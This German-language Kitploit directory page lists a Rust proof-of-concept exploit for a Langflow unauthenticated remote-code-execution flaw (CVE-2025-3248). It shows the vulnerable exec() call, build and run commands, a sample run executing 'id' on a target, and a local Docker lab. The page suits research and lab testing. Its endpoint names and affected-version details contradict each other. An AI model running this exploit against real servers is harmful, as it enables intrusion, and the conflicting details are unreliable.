Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-3248-POC — Rust-basierter Proof-of-Concept-Exploit für CVE-2025-3248, eine kritische, nicht authentifizierte RCE in Langflow über /api/v1/validate/code, die die Ausführung beliebiger Befehle ermöglicht. | Kitploit
Tools/GitHubGitHub/b0ysie7e/cve-2025-3248-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubb0ysie7e/cve-2025-3248-poc

CVE-2025-3248-POC

Rust-basierter Proof-of-Concept-Exploit für CVE-2025-3248, eine kritische, nicht authentifizierte RCE in Langflow über /api/v1/validate/code, die die Ausführung beliebiger Befehle ermöglicht.

Repository anzeigen
18vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Langflow RCE Exploit - CVE-2025-3248

⚠️ Haftungsausschluss
Dieser Code ist ausschließlich für Bildungs- und Forschungszwecke bestimmt. Die unbefugte Verwendung auf Systemen ohne ausdrückliche Genehmigung kann einen Verstoß gegen das Gesetz darstellen.
Der Autor ist nicht verantwortlich für Missbrauch oder böswillige Aktivitäten im Zusammenhang mit diesem Tool.


Informationen zur Schwachstelle

CVE-2025-3248 - Kritisch

CVSS-Score: 9.8 | EPSS-Score: 92.57% | Veröffentlicht: 22. Mai 2025

Betroffene Versionen

  • Verwundbar: Alle Versionen ≤ v1.3.0
  • Behoben: Versionen v1.3.0+

Angriffsvektor

Der Endpunkt /api/v1/validate/code akzeptiert unbereinigten Python-Code und führt ihn direkt mit exec() aus, ohne dass eine Authentifizierung erforderlich ist.

Verwundbarer Code

# langflow/api/builder/execute.py
exec(code)  # No input validation or sandboxing!

Technische Analyse

Langflow stellt einen /api/v1/builder/execute_code-Endpunkt bereit, der vom Benutzer bereitgestellten Python-Code entgegennimmt und ihn direkt an exec() im Backend übergibt. Da keine Authentifizierung oder Sandboxing vorhanden ist, können Angreifer beliebige Payloads zur Codeausführung erstellen.

Exploit ausführen

Voraussetzungen

  • Rust 1.70+ (Installation über rustup)
  • Cargo (Rust-Paketmanager)
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"

Beispiel:

❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   

Einrichtung des lokalen Labors

Schnellstart

> cd lab
> sudo docker-compose up -d

> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'

Labor stoppen

> sudo docker-compose down
Tool herunterladen